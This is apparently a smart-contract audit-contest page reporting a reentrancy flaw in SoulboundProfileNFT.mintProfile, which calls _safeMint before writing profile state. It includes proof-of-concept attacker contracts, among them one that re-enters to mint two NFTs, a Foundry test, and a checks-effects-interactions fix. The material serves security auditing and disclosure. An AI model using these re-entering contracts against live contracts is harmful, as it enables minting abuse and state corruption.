DatingDapp
AI First Flight #6
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

[H-3] Reentrancy Risk in SoulboundProfileNFT.mintProfile

cybernerd

Root + Impact

Description

  • SoulboundProfileNFT.mintProfile should establish user profile state before making external token transfer calls.

  • The function calls _safeMint before writing profileToToken[msg.sender] and _profiles[tokenId], exposing it to reentrancy risks if msg.sender is a contract.

function mintProfile(string memory name, uint8 age, string memory profileImage) external {
@> _safeMint(msg.sender, tokenId);
_profiles[tokenId] = Profile(name, age, profileImage);
profileToToken[msg.sender] = tokenId;
}

Risk

Likelihood:

  • A contract creating a profile can reenter during _safeMint via onERC721Received.

  • Any external callback can execute before the profile state is fully established.

Impact:

  • Profile data may become inconsistent, allowing duplicate minting or partial state corruption.

  • Attackers can exploit the reentrancy window to break soulbound invariants.

Proof of Concept

A malicious contract that implements IERC721Receiver can exploit the reentrancy window during _safeMint. This test demonstrates the vulnerability:

// Malicious receiver contract that reenters during _safeMint
contract ReentrancyAttacker is IERC721Receiver {
SoulboundProfileNFT nft;
address owner;
constructor(address _nft) {
nft = SoulboundProfileNFT(_nft);
owner = msg.sender;
}
function onERC721Received(address, address, uint256 tokenId, bytes calldata) external override returns (bytes4) {
// At this point, _safeMint is executing but profileToToken[owner] and _profiles[tokenId] are not yet set
// We can exploit this inconsistent state:
uint256 recorded = nft.profileToToken(owner);
// If recorded is still 0, we're in the reentrancy window!
require(recorded == 0, "State should not be set yet");
return this.onERC721Received.selector;
}
}

To verify, deploy a contract with the above code and call mintProfile with its address.

Recommended Mitigation

Follow the checks-effects-interactions pattern by writing all state changes before making external calls:

- _safeMint(msg.sender, tokenId);
- _profiles[tokenId] = Profile(name, age, profileImage);
- profileToToken[msg.sender] = tokenId;
+ _profiles[tokenId] = Profile(name, age, profileImage);
+ profileToToken[msg.sender] = tokenId;
+ _safeMint(msg.sender, tokenId);
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 7 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-04] Reentrancy in `SoulboundProfileNft::mintProfile` allows minting multiple NFTs per address, which disrupts protocol expectations

## Description In `mintProfile`, the internal `_safeMint` function is called before updating the contract state (`_profiles[tokenId]` and `profileToToken[msg.sender]`). This violates CEI, as `_safeMint` calls an internal function that could invoke an external contract if `msg.sender` is a contract with a malicious `onERC721Received` implementation. Source Code: ```solidity function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ``` ## Vulnerability Details Copy this test and auxiliary contract in the unit test suite to prove that an attacker can mint multiple NFTs: ```solidity function testReentrancyMultipleNft() public { MaliciousContract maliciousContract = new MaliciousContract( address(soulboundNFT) ); vm.prank(address(maliciousContract)); MaliciousContract(maliciousContract).attack(); assertEq(soulboundNFT.balanceOf(address(maliciousContract)), 2); assertEq(soulboundNFT.profileToToken(address(maliciousContract)), 1); } ``` ```Solidity contract MaliciousContract { SoulboundProfileNFT soulboundNFT; uint256 counter; constructor(address _soulboundNFT) { soulboundNFT = SoulboundProfileNFT(_soulboundNFT); } // Malicious reentrancy attack function attack() external { soulboundNFT.mintProfile("Evil", 99, "malicious.png"); } // Malicious onERC721Received function function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4) { // Reenter the mintProfile function if (counter == 0) { counter++; soulboundNFT.mintProfile("EvilAgain", 100, "malicious2.png"); } return 0x150b7a02; } } ``` ## Impact The attacker could end up having multiple NTFs, but only one profile. This is because the `mintProfile`function resets the `profileToToken`mapping each time. At the end, the attacker will have only one profile connecting with one token ID with the information of the first mint. I consider that the severity is Low because the `LikeRegistry`contract works with the token IDs, not the NFTs. So, the impact will be a disruption in the relation of the amount of NTFs and the amount of profiles. ## Recommendations To follow CEI properly, move `_safeMint` to the end: ```diff function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; - _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; + _safeMint(msg.sender, tokenId); emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!